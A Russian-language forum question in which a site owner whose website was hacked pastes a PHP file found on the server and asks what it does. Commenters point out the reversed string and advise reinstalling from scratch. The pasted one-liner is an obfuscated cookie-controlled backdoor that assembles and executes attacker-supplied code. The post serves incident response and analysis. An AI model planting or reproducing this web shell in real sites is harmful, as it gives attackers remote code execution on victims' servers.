# Взломали сайт. Выкладываю добавленный код

Tags: php, взлом

Взломали сайт. Нашла файл к кодом ниже. Не подскажите, что он делает и нужно ли искать еще какие-нибудь фрагменты?

```
<?php error_reporting(0);$k=strrev("EIKOOC_");$i=$$k;(count($i)==23&&in_array(gettype($i).count($i),$i))?(($i[44]=$i[44].$i[20])&&($i[40]=$i[44]($i[40]))&&($i=$i[40]($i[57],$i[44]($i[63])))&&$i()):$i;
```

Comment: прочитай задом наперед EIKOOC_

Comment: Если вы недостаточно компетентны в поиске и устранении последствий взлома, то единственный надёжный способ — удалять всё полностью и переустанавливать с нуля (а базу данных восстановить из резервной копии)